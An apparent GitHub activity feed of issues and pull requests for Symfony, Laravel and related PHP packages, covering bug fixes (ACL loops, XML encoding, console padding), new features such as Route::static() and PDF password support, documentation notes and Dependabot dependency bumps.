Package Version

1.4.0

PHP Version

8.3.16

Laravel Version

10.48.22

CockroachDB Version

v25.1

Which operating systems does with happen with?

macOS

Notes

See: https://github.com/cockroachdb/cockroach/pull/140156

View more
2 comments
LegendEffects

LegendEffects

21st May 2025 @ 22:40

Closes #264

Adds a password() method to open password-protected (encrypted) PDFs. The password is passed to Imagick via Ghostscript's authenticate option before pinging or reading the file.

$pdf->password('your-password')->save($pathToImage);

Without a password (or with the wrong one), Imagick throws as before.

View more
freekmurze

freekmurze

26th Jun 2026 @ 09:49

Octane Version

2.13.5

Laravel Version

12.50.0

PHP Version

8.3.29

What server type are you using?

Open Swoole

Server Version

25.2.0

Database Driver & Version

MySQL 8.4 (Percona)

Description

When using Redis as a cache store, Octane is keeping Redis connections open indefinitely even after a request has been terminated. This is leading to incremental Redis connections that get opened by Octane, and never closed.

We've implemented a listener and added to Octane's RequestTerminated section and this is working much better.

I believe this should be implemented into Octane's core code and config file so others don't get the issue.

Our code was to do this, and add it to RequestTerminated

namespace App\Listeners\Octane;

use Illuminate\Support\Facades\Redis;

class TerminateRedisConnections
{
    /**
     * Handle the event.
     *
     * @param  object  $event
     * @return void
     */
    public function handle($event): void
    {
        foreach (array_keys(config('database.redis', [])) as $connection) {
            if ($connection === 'options') {
                continue;
            }

            try {
                Redis::connection($connection)->disconnect();
            } catch (\Throwable) {
                // Best-effort cleanup; the next request will establish fresh sockets as needed.
            }
        }
    }
}

Steps To Reproduce

Redis states that connections are left open forever unless closed, but, even after specifying a timeout as per their docs this actually closes connections too quick.

View more
2 comments
sts-ryan-holton

sts-ryan-holton

10th Feb 2026 @ 10:23

Status: Needs Review Waiting Code Merge

First draft of the documentation for the new KeyManagement component (introduced in symfony/symfony#64052) and its bridges.

Adds two new pages:

  • key-management.rst: framework-level guide covering framework.key_management configuration (yaml/xml/php), DSN scheme table, multi-client setup, autowiring (default + named-argument aliases), console commands, and Doctrine column-level encryption.
  • components/key-management.rst: standalone component reference covering direct vs envelope mode, AAD, deterministic encryption, the three local backends (libsodium, OpenSSL, sealed box), key loaders, all DSN schemes, the four bridges (AWS KMS, Vault Transit, Flysystem, Doctrine DBAL), envelope wire format, and DataKey::use() / memory wiping.

index.rst gets a new key-management toctree entry; components/index.rst already uses :glob: * so the component page is picked up automatically.

The component itself is still experimental: once the eventual #[Encrypted] attribute lands in symfony/doctrine-kms, the Doctrine section will be reworked to lead with the attribute and demote the manual Type::getTypeRegistry()->register() call to a fallback.

View more
Spomky

Spomky

27th Apr 2026 @ 21:57

Hi,

i have some entity with enums, did created successfully with make:entity, i can even add more enums. but if i try to regenare all my entities enums breaks the process.

In ClassSourceManipulator.php line 1369:

Cannot build a node expr for value of type "object"

i checked, and if dump the object it shows the first case from my backed enum.

thanks for your help!

ver: v1.64.0

View more
papppeter

papppeter

19th Sep 2025 @ 13:58

Bug Status: Needs Review ObjectMapper
Q A
Branch? 8.1
Bug fix? yes
New feature? no
Deprecations? no
Issues Fix #64761
License MIT

ObjectMapper::getSourceValue(), which resolves nested object-valued properties, calls getMapTarget() with enforceUnique: true unconditionally:

&& ($mapTo = $this->getMapTarget($innerMetadata, $value, $source, $target, true))

A source class listed against several targets in a reverse class map yields one Mapping per target, so getMapTarget() throws Ambiguous mapping on the second candidate — before the destination property's type ever gets a chance to select one. #64567 made doMap() target-aware (it filters mappings by targetClass), but that awareness is missing on this path.

$classMap = [
    OuterSource::class => [OuterTarget::class],
    InnerSource::class => [InnerTargetA::class, InnerTargetB::class],
];

// OuterTarget::$inner is typed InnerTargetA, yet:
// MappingException: Ambiguous mapping for "InnerSource".
$mapper->map(new OuterSource(), OuterTarget::class);

The candidate mappings are now narrowed to the one assignable to the declared type of the property they are mapped into. If narrowing does not leave exactly one candidate, the metadata is left untouched and the existing ambiguity check runs as before.

The guard is still there

That last point is the one worth reviewing. It would be easy to "fix" this by relaxing enforceUnique, which would silently pick a mapping at random. Two cases still throw, and both are covered:

  • an untyped destination property (public $inner;) — nothing to narrow with;
  • a destination property typed with an interface both targets implement — narrowing leaves two candidates.

testClassMapWithMultipleTargetsThrowsWhenTheNestedPropertyIsUntyped locks the first one down. It passes before and after the fix, on purpose.

Tests

testClassMapWithMultipleTargetsResolvesNestedPropertyByItsType fails without the fix (MappingException: Ambiguous mapping for "…\NestedClassMap\InnerSource"). The suite goes from 91 to 93 tests, no other change.

Thanks @MateuszJozwik1 for an issue that pointed at the exact line — twice this week. 🙂

View more
Amoifr

Amoifr

10th Jul 2026 @ 13:26

Hello guys, I'm using symfony 2.8 and ACL in order to check the permissions for all users in every action in my application. I have a problem with Mutable ACL provider. My problem is in some please I'm trying to remove the user permissions and I'm using the method deleteClassAce in the ACL using the respective index for the specific user after executed the method and try the update ACL the ACL response "Notice: Undefined offset: 4". Looking in the ACL class I saw in the deleteAce method you are executing an unset in the aces arrey "unset($aces[$index]);" and this deleted the element in the array but not reset the array positions and the index in the array are lost for example.

Before executed the deleteClassAce I have these index (0,1,2,3,4), after execute deleteClassAce using index 2 the new index are (0,1,3,4) instead of (0,1,2,3) it's normal because it is a typical behavior in the php arrays the problem is, after executed the deleteClassAce I need to give other permissions in the ACL I'm using and in MutableAclProvider you have this code in updateOldAceProperty method.

for ($i = 0, $c = count($new); $i < $c; ++$i) {
            $ace = $new[$i];

            if (null !== $ace->getId()) {
                $currentIds[$ace->getId()] = true;
            }
        }

for ($i = 0, $c = count($old); $i < $c; ++$i) {
            $ace = $old[$i];

            if (!isset($currentIds[$ace->getId()])) {
                $this->connection->executeQuery($this->getDeleteAccessControlEntrySql($ace->getId()));
                unset($this->loadedAces[$ace->getId()]);
            }
        }

As you can see you are iterating the array using index and I have in my $old ACL the index (0,1,3,4). the for loop create incremental index and the index 2 is generated after increase variable $i in the array and in the $ace asignation of cource if $i = 2 the index $old[$i] not exist at this point and where it where the notice is throw.

In my local server I tested the foreach loop instead of for loop and the ACL works fine this is the code I change in the method.

The original method looks like this.

private function updateOldAceProperty($name, array $changes)
    {
        list($old, $new) = $changes;
        $currentIds = array();

        for ($i = 0, $c = count($new); $i < $c; ++$i) {
            $ace = $new[$i];

            if (null !== $ace->getId()) {
                $currentIds[$ace->getId()] = true;
            }
        }

        for ($i = 0, $c = count($old); $i < $c; ++$i) {
            $ace = $old[$i];

            if (!isset($currentIds[$ace->getId()])) {
                $this->connection->executeQuery($this->getDeleteAccessControlEntrySql($ace->getId()));
                unset($this->loadedAces[$ace->getId()]);
            }
        }
    }

and my method looks like this

private function updateOldAceProperty($name, array $changes)
    {
        list($old, $new) = $changes;
        $currentIds = array();
        foreach($new as $key => $ace){
         if (null !== $ace->getId()) {
        $currentIds[$ace->getId()] = true;
        }
    }

    foreach($old as $key => $ace){
       if (!isset($currentIds[$ace->getId()])) {
        $this->connection->executeQuery($this->getDeleteAccessControlEntrySql($ace->getId()));
            unset($this->loadedAces[$ace->getId()]);
        }
    }
    }

and it works for me.

Is it the solution or exist other problem for user foreach loop instead of for loop?

View more
2 comments
rtoledof

rtoledof

10th Jun 2016 @ 08:02

Feature Status: Needs Review Mate
Q A
Bug fix? no
New feature? yes
Docs? yes
Issues -
License MIT

Agent Skills (SKILL.md) shipped by Mate extensions are now installed onto the filesystem where coding agents read them — a polyfill until skills can be served over MCP directly.

Background — MCP Skills (SEP-2640)

This is the consumer/polyfill side of the MCP Skills effort:

  • SEP-2640 proposes serving Agent Skills over MCP's Resources primitive as skill:// resources — modelcontextprotocol/modelcontextprotocol#2640.
  • #2132 already added skill content to the Mate Symfony bridge, anticipating the extension (agentskills.io + SEP-2640 layout) — #2132.
  • modelcontextprotocol/php-sdk#372 implements the serving half in the PHP SDK (skill:// resources + discovery index).

The missing piece is getting those skills onto the filesystem: Claude Code and other agents do not consume MCP-served skills yet (June 2026) — they only read skills from disk. This PR bridges that gap and can be retired once agents consume MCP-served skills end-to-end.

How it works

Extensions declare one or more skills directories via a new extra.ai-mate.skills key:

{
    "extra": {
        "ai-mate": {
            "scan-dirs": ["src"],
            "skills": ["skills"]
        }
    }
}

Each immediate subdirectory holding a SKILL.md is one skill. Mate symlinks each one — under a mate- prefixed directory name (e.g. mate-system-information) to avoid clashing with skills you maintain from other sources — into .agents/skills/ (read by Codex, OpenCode and GitHub Copilot) and mirrors it into .claude/skills/ for Claude Code, which only reads its own directory. The links point into the gitignored vendor/, so skills auto-update on composer update.

Usage

Skills install automatically as part of discover, which already runs after composer require, so there's usually nothing to run:

$ vendor/bin/mate discover

For an explicit re-sync:

$ vendor/bin/mate skills:install

The core package ships a built-in system-information skill to demonstrate the format and dogfood the mechanism.

Notes

  • Documentation added under docs/components/mate.rst and docs/components/mate/creating-extensions.rst; CHANGELOG.md updated.
  • Covered by tests (installer, command, discovery, and the discover auto-sync); PHPStan clean.
View more
5 comments 👍 1 👀 1
wachterjohannes

wachterjohannes

21st Jun 2026 @ 19:22

Bumps actions/checkout from 4 to 7.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
1 comment
dependabot[bot]

dependabot[bot]

1st Jul 2026 @ 14:23

Hello,

As we have automated localization content browsing enabled, is there any way to do the same for notifications as well ? It would be great to have for localized content.

View more
1 comment
abhilash0987

abhilash0987

11th Jan 2022 @ 17:09

I'm upgrading a Symfony 2.6 installation and found this package as a dependency. This package seems to be empty and it doesn't add any functionality. Is this package/project deprecated?. Can I safely remove it from the composer dependencies?

View more
3 comments
mauricios

mauricios

8th Jan 2020 @ 16:32

When generating registration or reset password forms using the MakerBundle, some validation constraints are still passed using arrays. This triggers deprecation warnings in Symfony 7.3+:

Passing an array of options to configure the "%s" constraint is deprecated, use named arguments instead.

This PR updates the generated code to use named arguments for these constraints, removing the deprecations and ensuring compatibility with future Symfony versions.

View more
octoseth

octoseth

4th Aug 2025 @ 19:20

Recently I started to look at ACL tables and noticed that all the existing entries are still there even after deleting objects or security identities.

So I looked up and found the two methods that do exactly that. In MutableAclProvider.php deleteSecurityIdentity() and deleteAcl()

Now deleting ACL is easy and works great when removing a user. However I also want to remove the security identity as well to prevent the issue when someone sign ups with the same user name later and managed to get the same permissions as the previous user.

The problem: Deleting security identity leaves object ace indexes not in order [0, 1, 3, 4] etc.

This causes issue when trying to modify the ACL for objects that were affected by security identity delete. The method updateOldAceProperty() is called and causes the undefined index notice to be thrown due to the for loop expecting correctly ordered indexes.

MutableAclProvider.php Line 980

for ($i = 0, $c = count($old); $i < $c; ++$i) {
     $ace = $old[$i];
     if (!isset($currentIds[$ace->getId()])) {
        $this->connection->executeQuery($this->getDeleteAccessControlEntrySql($ace->getId()));
        unset($this->loadedAces[$ace->getId()]);
     }
}

Looking at it, all it does is tries to delete the old ace, that was already deleted by by deleteSecurityIdentity() method.

A simple solution would be to transform for loop to foreach, that would fix the index issues

foreach ($old as $ace) {
    if (!isset($currentIds[$ace->getId()])) {
        $this->connection->executeQuery($this->getDeleteAccessControlEntrySql($ace->getId()));
        unset($this->loadedAces[$ace->getId()]);
     }
 }

Let me know if I have wrong approach to this or it seems ok and could be changed in the main repository

View more
kYem

kYem

1st Sep 2015 @ 10:00

Status: Needs Review Feature LiveComponent
Q A
Bug fix? yes
New feature? no
Issues Fix #3413
License MIT

Today, live_action() casts its return value to a string, which prevents it from being spread into a Twig component tag:

{# ❌ doesn't work: the spread receives a plain string #}
<twig:Table:Head {{ ...live_action('sort', {sortBy: 'id'}) }}>

stimulus_action() already returns a StimulusAttributes object (which is both \Stringable and \IteratorAggregate), so the same call written against it does work. The asymmetry was pointed out by @squrious in the issue discussion.

This PR aligns live_action() with stimulus_action() by returning the same StimulusAttributes object directly. Existing usages remain unaffected because Twig calls __toString() automatically when rendering the value (e.g. <button {{ live_action('save') }}>), and the helper is marked @internal on the PHP side.

The existing LiveComponentRuntimeTest::testGetLiveAction is adapted to cast the value to string for the equality assertion and gains a new assertInstanceOf to lock the return type.

View more
3 comments ❤️ 1
Amoifr

Amoifr

11th May 2026 @ 08:39

Hi everyone, I post that message do discuss about the better way to translate flash messages. In my case, I use symfony/demo as the place were better practices are grouped in a project.

  1. I wonder if it can be interesting to call the t() function in the Controller to have the extractor ? The second case allow to auto-extract the messages in XLIFF, but add complexity in the Controller.
  2. Can it be a good idea to use a cusom domain ?
  3. Is it better to use reusable keyword ? or like actually localized keywords ?

These are questions I am asking myself right now to implement tramslation in a project. I know that questions are not totally related with the demo, it's more best practices.

View more
1 comment
mpiot

mpiot

4th May 2023 @ 11:44

Documentation Status: Needs Review LiveComponent
Q A
Bug fix? no
New feature? no
Deprecations? no
Documentation? yes
Issues
License MIT

Doc-only resubmission of #3541 (closed alongside #3540) — rebased onto `3.x` and the Q/A header is now in place, as @Kocal asked on related PRs. No behaviour change.

`#[LiveProp]` has a few intentional, by-design sharp edges that aren't surfaced at the attribute declaration site:

  • `url: true` on an entity-typed prop — the identifier comes from the query string and is loaded with no authorization check (same trust model as `#[MapEntity]`).
  • `writable: true` on an entity-typed prop — same via the `updated` payload.
  • `writable: true` on a plain object prop — `hydrateObjectValue()` writes client-supplied property names; `PropertyAccessor` bounds this to the class's public write surface, but any public setter is reachable.

These are documented tradeoffs of the component model, not bugs — the change just makes them visible at the call site so a developer doesn't have to derive them from the hydrator internals.

Commits

  • `[LiveComponent] Document IDOR risk of url-mapped LiveProp on entity types` — note on `LiveProp::$url`
  • `[LiveComponent] Document IDOR risk of writable LiveProp on entity types` — note on `LiveProp::$writable`
  • `[LiveComponent] Note write-surface exposure when hydrating plain object props` — inline comment in `LiveComponentHydrator::hydrateObjectValue()`

cc @kbond @smnandre — wording open for discussion; happy to move some of this into the reference docs instead if you'd rather keep the docblocks terse.

View more
Amoifr

Amoifr

15th May 2026 @ 14:05

View more
7-zete-7

7-zete-7

25th Mar 2026 @ 10:10

Serializer
Q A
Symfony version 6.4 → 8.2 (all maintained branches)
PHP version 8.5.4 (libxml 2.15.2)

Description

XmlEncoder is supposed to reject data that cannot be represented in XML: encoding a string containing a character forbidden by XML 1.0 must throw a NotEncodableValueException. That is what XmlEncoderTest::testEncodeException() asserts.

On a recent libxml, it doesn't throw anymore. The invalid character is silently replaced with U+FFFD and the encoder happily returns a document. Data is corrupted without any signal.

How to reproduce

use Symfony\Component\Serializer\Encoder\XmlEncoder;

$encoder = new XmlEncoder();
var_dump($encoder->encode('Invalid character: '.\chr(7), 'xml'));

PHP 8.4.19 / libxml 2.9.14 — correct:

NotEncodableValueException: DOMDocument::saveXML(): xmlEscapeEntities : char out of range

PHP 8.5.4 / libxml 2.15.2 — no exception:

string(71) "<?xml version="1.0"?>
<response>Invalid character: &#xFFFD;</response>
"

Running the existing test suite on PHP 8.5 shows it as a failure, on a pristine checkout of any maintained branch:

1) Symfony\Component\Serializer\Tests\Encoder\XmlEncoderTest::testEncodeException
Failed asserting that exception of type "NotEncodableValueException" is thrown.

Root cause

XmlEncoder::saveXml() doesn't detect invalid characters itself — it detects them indirectly, by installing an error handler that turns the E_WARNING raised by DOMDocument::saveXML() into a NotEncodableValueException:

$prevErrorHandler = set_error_handler(static function ($type, $message, ...) use (&$prevErrorHandler) {
    if (\E_ERROR === $type || \E_WARNING === $type) {
        throw new NotEncodableValueException($message);
    }
    // ...
});

Recent libxml no longer emits that warning: it substitutes U+FFFD and moves on. And it doesn't record a libxml error either — so the condition is undetectable from libxml:

$d = new DOMDocument('1.0', 'UTF-8');
$root = $d->createElement('response');
$root->appendChild($d->createTextNode('x'.\chr(7)));
$d->appendChild($root);

libxml_use_internal_errors(true);
libxml_clear_errors();
$out = $d->saveXML();

var_dump(\count(libxml_get_errors()));  // int(0)  ← nothing, not even an internal error
var_dump($out);                         // <response>x&#xFFFD;</response>

So the current guard is simply blind on libxml >= ~2.14: the only way to keep the guarantee is for the Serializer to validate the characters explicitly, instead of relying on libxml complaining.

Why it matters

This isn't just a red test. Any application that upgrades to PHP 8.5 (or a distro shipping a newer libxml) will start silently corrupting XML payloads that were previously rejected — the failure mode changes from a loud exception to a wrong document, which is the worst direction for this kind of bug.

Possible fix

Validate the value against the XML character production before it reaches libxml (in appendText() / appendCData() and for attribute values), and throw NotEncodableValueException on characters that XML 1.0 forbids — plus on malformed UTF-8, which preg_match('/../u') reports via PREG_BAD_UTF8_ERROR rather than a match.

Two things I'd rather have your call on before sending a PR:

  1. Target branch. The set_error_handler guard (and testEncodeException) only exists on the recent branches — on 6.4, encode() calls $dom->saveXML() directly and never converted the warning into an exception. So "oldest maintained branch with the bug" isn't clear-cut here: restoring the exception on 6.4 would arguably be a behavior change rather than a fix.
  2. XML 1.1. chr(7) is legal in XML 1.1 (as an escaped character reference), yet libxml 2.15 replaces it with U+FFFD there too. Should the encoder throw for xml_version: '1.1' as well, or is that a separate concern?

Happy to send the PR as soon as you tell me which way to go. 🙂

View more
1 comment
Amoifr

Amoifr

11th Jul 2026 @ 18:52

Summary

This PR adds deprecation notices to several features that will be removed in v2.0, guiding users toward the recommended upgrade path. Each deprecated component now includes both PHPDoc annotations and runtime deprecation warnings via trigger_error().

Key Changes

  • SubscribableApplicationServiceProvider: Added deprecation notice directing users to publish the subscriber-provider stub and configure callbacks directly in their service provider's boot() method
  • SubscriberMailChannel: Added deprecation notice recommending explicit opt-in via SubscribableMailMessage::via() instead of automatic unsubscribe-link injection
  • Subscriber::userModel(): Added deprecation notice directing users to remove calls and use polymorphic model resolution via morph maps instead
  • CheckNotifiableSubscriptionStatus interface: Added deprecation notice indicating subscription gating is now handled by SubscribableMailMessage::via()
  • CheckSubscriptionStatusBeforeSendingNotifications interface: Added deprecation notice indicating subscription gating is now handled by SubscribableMailMessage::via()

Implementation Details

  • All deprecation warnings use E_USER_DEPRECATED to allow users to control handling via error reporting configuration
  • Each deprecated component includes a reference to UPGRADE.md for detailed migration guidance
  • Runtime warnings are triggered at the point of use (method calls or class instantiation) to ensure users are notified during development
  • PHPDoc annotations provide IDE support and static analysis hints about deprecation status

https://claude.ai/code/session_01MsY3G5SB16WXTcZGkMb7FX

View more
peterfox

peterfox

2nd Jun 2026 @ 09:52

Fixes #700.

Summary

  • add profile hero image upload and removal to profile settings
  • store custom hero image paths on users and render them on profile headers and profile summary cards
  • add feature coverage for upload, replacement, removal, validation, and rendering

Tests

  • php -l app/Models/User.php
  • php -l app/Http/Requests/UpdateProfileRequest.php
  • php -l app/Jobs/UpdateProfile.php
  • php -l database/migrations/2026_06_18_000000_add_hero_image_path_to_users_table.php
  • php artisan view:cache
  • npm run build
  • vendor/bin/pest tests/Feature/SettingsTest.php tests/Feature/ProfileTest.php --filter="profile hero|custom hero"
View more
1 comment
sawirricardo

sawirricardo

18th Jun 2026 @ 12:31

Documentation Status: Needs Review Feature LiveComponent
Q A
Bug fix? no
New feature? yes
Deprecations? no
Documentation? yes
Issues Related to #1038, #1676
License MIT

Re-emits the existing render:started and render:finished JS hooks as bubbling DOM events on the component's root element, alongside the already-public live:connect / live:disconnect. Purely additive, no BC concern.

element.addEventListener('live:render:finished', (event) => {
    // event.detail.component, event.detail.controller
});

element.addEventListener('live:render:started', (event) => {
    // event.detail.html, event.detail.backendResponse, event.detail.controls
});

The motivation is the longstanding pain in #1038 / #1676 (both closed by stale-bot, neither resolved): third-party Stimulus controllers that need to react to a render have to import getComponent, await it inside initialize(), and register against the JS hook API, which is racey on first mount and only fires for re-renders. Falling back to a MutationObserver works but observes every DOM change rather than render boundaries. A bubbling DOM event lets any code subscribe with a single addEventListener, no async setup, no race.

Implementation re-uses the existing dispatchEvent helper that already powers live:connect / live:disconnect. Test in test/unit/controller/render.test.ts, doc section under "JavaScript Component Hooks > DOM Events", CHANGELOG entry under 3.1.

View more
1 comment
haraldpdl

haraldpdl

26th Apr 2026 @ 07:23

Fixes: #1718

Change

if (!class_exists(WebTestCase::class)) {
    $io->caution('You\'ll need to install the `symfony/test-pack` to execute the tests for your new controller.');
}

to

if (!class_exists(TestCase::class)) {
    $io->caution('You\'ll need to install the `symfony/test-pack` to execute the tests for your new controller.');
}
  • Symfony\Bundle\FrameworkBundle\Test\WebTestCase to PHPUnit\Framework\TestCase

Error is now displayed and files are created

generate-phpunit-tests-make-controller-ok2

generate-phpunit-tests-make-crud-ok2

generate-phpunit-tests-make-registration-form-ok1

generate-phpunit-tests-make-reset-password-ok2

generate-phpunit-tests-make-security-form-login-ok2

View more
Maxcastel

Maxcastel

14th Jul 2025 @ 17:42

Hello,

when I recreate my Cachet docker container, the Cachet must be resetuped.

But why I should resetup Cachet if I recreate my Cachet container.

Configs

docker-compose.yml

version: "3"

services:
  postgres:
    image: postgres:12-alpine
    volumes:
      - /var/lib/postgresql/data
    environment:
      - POSTGRES_USER=postgres
      - POSTGRES_PASSWORD=************************
    restart: always
  cachet:
    build:
      context: .
      args:
        - cachet_ver=2.4
    ports:
      - 127.0.0.2:81:8000
    links:
      - postgres:postgres
    environment:
      - DB_DRIVER=pgsql
      - DB_HOST=postgres
      - DB_PORT=5432
      - DB_DATABASE=postgres
      - DB_USERNAME=postgres
      - DB_PASSWORD=************************
      - DB_PREFIX=chq_
      - APP_KEY=base64:********
      - APP_LOG=errorlog
      - APP_ENV=${APP_ENV:-production}
      - APP_DEBUG=false
      - DEBUG=false
      - CACHE_DRIVER=database
      - SESSION_DRIVER=database
      - QUEUE_DRIVER=sync
      - MAIL_DRIVER=smtp
      - MAIL_HOST=mail.*****
      - MAIL_PORT=587
      - MAIL_USERNAME=status@****
      - MAIL_PASSWORD=*****
      - MAIL_ADDRESS=status@****
      - MAIL_ENCRYPTION=tls

    depends_on:
      - postgres
    restart: always

Executed command

docker-compose down && docker-compose up -d
View more
1 comment
AdriDevelopsThings

AdriDevelopsThings

29th Nov 2020 @ 16:10

In my commands, I want loggers to log into the file console.log

Here is my monolog.yaml conf:

when@prod:
    monolog:
        handlers:
            console:
                type: stream
                level: debug
                path: "%kernel.logs_dir%/console.log"
                channels: console
            console-error:
                type: stream
                level: error
                path: "%kernel.logs_dir%/console-error.log"
                channels: console
            info:
                type: stream
                path: "%kernel.logs_dir%/info.log"
                level: info

In my command I've added this: #[WithMonologChannel('console')]

Every log in my command are correctly logged to console.log but every time I call a function outside my command class, the log is logged in info.log.

The issue is that I don't want to add #[WithMonologChannel('console')] in my other class since it's used by other services.

Is there any way to propagate the channel along called functions ?

View more
3 comments
baptistebisson

baptistebisson

18th Apr 2024 @ 09:28

Bug Console Status: Needs Review
Q A
Branch? 6.4
Bug fix? yes
New feature? no
Deprecations? no
Issues -
License MIT

This PR fixes two ValueError: str_repeat(): Argument #2 ($times) must be greater than or equal to 0 crashes in the Console component. Both are caused by the same underlying mistake: computing a padding/width from the byte length of a string while comparing it against a value expressed in display width (columns). When a string's display width is smaller than its byte length (multibyte characters) or a character occupies more than one column, the intermediate count goes negative and str_repeat() throws.

1. TextDescriptor::describeInputArgument()

$totalWidth = $options['total_width'] ?? Helper::width($argument->getName());
$spacingWidth = $totalWidth - \strlen($argument->getName()); // ← byte length

$totalWidth is a display width (Helper::width()mb_strwidth()), but the padding subtracts the byte length (\strlen()). For an argument name whose display width is smaller than its byte length, the two are inconsistent:

  • If that argument is the widest column, $spacingWidth becomes negative and str_repeat(' ', $spacingWidth) throws. Example: describing an argument named 路径 (display width 4, byte length 6) with no wider option present → $spacingWidth = 4 - 6 = -2 → crash.
  • Otherwise the description column is simply misaligned (indented too far left by strlen − width spaces).

Every sibling method already uses display width: describeInputOption() uses $totalWidth - Helper::width($synopsis), and describeInputDefinition() derives total_width from Helper::width(). This line was left as \strlen() — an oversight from the Helper::strlen() → Helper::width() migration. The fix aligns it:

$spacingWidth = $totalWidth - Helper::width($argument->getName());

2. ProgressBar – the bar placeholder

$emptyBars = $bar->getBarWidth() - $completeBars - Helper::length(Helper::removeDecoration($output->getFormatter(), $bar->getProgressCharacter()));
$display .= $bar->getProgressCharacter().str_repeat($bar->getEmptyBarCharacter(), $emptyBars);

$emptyBars is never clamped. As the bar approaches 100 %, $completeBars reaches barWidth - 1, so $emptyBars = 1 - length(progressCharacter). The progress character is a public API (setProgressCharacter()) and may be more than one column wide, in which case $emptyBars goes negative and str_repeat() throws.

Reproduction:

$bar = new ProgressBar($output, 28);
$bar->setProgressCharacter('=>'); // 2 columns
$bar->setProgress(27);            // completeBars = 27, emptyBars = 28 - 27 - 2 = -1  → ValueError

Fixed by clamping:

$display .= $bar->getProgressCharacter().str_repeat($bar->getEmptyBarCharacter(), max(0, $emptyBars));

Tests

  • Added ProgressBarTest::testMultiCharProgressCharacterNearCompletion().
  • Added TextDescriptorTest::testDescribeInputArgumentWithMultibyteName().
  • Updated the command_mbstring.txt fixture: the multibyte argument column is now correctly aligned with the options column (the only change is the padding of that one line).

Both new tests fail with the described ValueError on the current code and pass with the fix.

View more
1 comment
sadiqk2

sadiqk2

13th Jul 2026 @ 10:33

DependencyInjection hasPR
Q A
Feature PR symfony/symfony#63710
PR author(s) @nicolas-grekas
Merged in 8.1

We created this issue to not forget to document this new feature. We would really appreciate if you can help us with this task. If you are not sure how to do it, please ask us and we will help you.

To fix this issue, please create a PR against the 8.1 branch in the symfony-docs repository.

Thank you! :smiley:

View more
chalasr

chalasr

1st Apr 2026 @ 18:27

dependencies javascript

Bumps @babel/core from 7.29.0 to 7.29.7.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.
View more
dependabot[bot]

dependabot[bot]

26th Jun 2026 @ 11:04

dependencies php

Bumps barryvdh/laravel-debugbar from 3.16.3 to 4.1.3.

Dependabot compatibility score

You can trigger a rebase of this PR by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

Note Automatic rebases have been disabled on this pull request as it has been open for over 30 days.

View more
dependabot[bot]

dependabot[bot]

13th Mar 2026 @ 02:04

View more
kamilkozak

kamilkozak

11th Jun 2026 @ 16:38

Summary

This PR adds a first-class Route::static() method for routes whose HTML responses are safe to cache in shared/CDN caches.

Static routes:

  • skip configured stateful middleware for cacheable non-Inertia requests,
  • strip response cookies before the response is cached,
  • emit Cache-Control, optional CDN-Cache-Control, and merged Vary headers,
  • bypass static response mutation for X-Inertia requests, non-cacheable methods, non-cacheable statuses, and redirects.

The local target was confirmed as Laravel 13.x: composer.json aliases dev-master to 13.0.x-dev, and the local origin/HEAD points at origin/13.x.

Design

The route API stores static-cache metadata under the route action's static_cache key and attaches Illuminate\Routing\Middleware\CacheStaticResponse.

For request-side middleware stripping, this PR uses a narrow conditional pipeline approach instead of permanently calling withoutMiddleware() from Route::static(). This keeps the behavior request-aware:

  • normal cacheable static requests skip configured stateful middleware,
  • X-Inertia requests keep normal middleware so Inertia partial reloads remain dynamic,
  • non-cacheable methods keep normal middleware.

This preserves the useful parts of the existing middleware exclusion resolver, including middleware group expansion and subclass matching, without making the exclusion unconditional for every request to the route.

The HTTP kernel also reapplies the static response mutation after the full middleware stack has completed. This makes the final emitted headers authoritative when a later global middleware writes private / no-store cache headers. Livewire's back-button-cache middleware is the practical case this protects: a user-independent initial Livewire render can still be made cacheable by Route::static(), while Livewire update requests remain untouched.

Configuration

The default options live under a new top-level static key in config/cache.php:

  • ttl
  • browser_ttl
  • strip_cookies
  • strip_middleware
  • vary
  • cdn_cache_control

This lives in config/cache.php because the feature configures HTTP cache policy and CDN/browser cache behavior. It does not belong in config/session.php, and a new config/http.php would introduce broader new configuration surface for one cache-related feature. The middleware also keeps hardcoded defaults so the framework remains usable before the application skeleton receives the matching config block.

Cloudflare / CDN caveat

These headers mark a response as suitable for shared caching, but Cloudflare and similar CDNs may still require a Cache Rule or equivalent edge configuration before HTML is cached. Cache invalidation and purging remain CDN-side concerns and are intentionally out of scope.

Related PRs

Docs

Docs PR: https://github.com/laravel/docs/pull/11214

The docs PR covers:

  • what Route::static() does and does not do,
  • routes that should not use it, such as authenticated or per-user content,
  • the Cloudflare Cache Rule requirement,
  • Inertia behavior,
  • Livewire compatibility for user-independent initial renders.

Compatibility Verification

Verified with the Herd test app against the Laravel 13.x PR branch:

  • PHP 8.4 + Inertia 2 + Livewire 3: passed
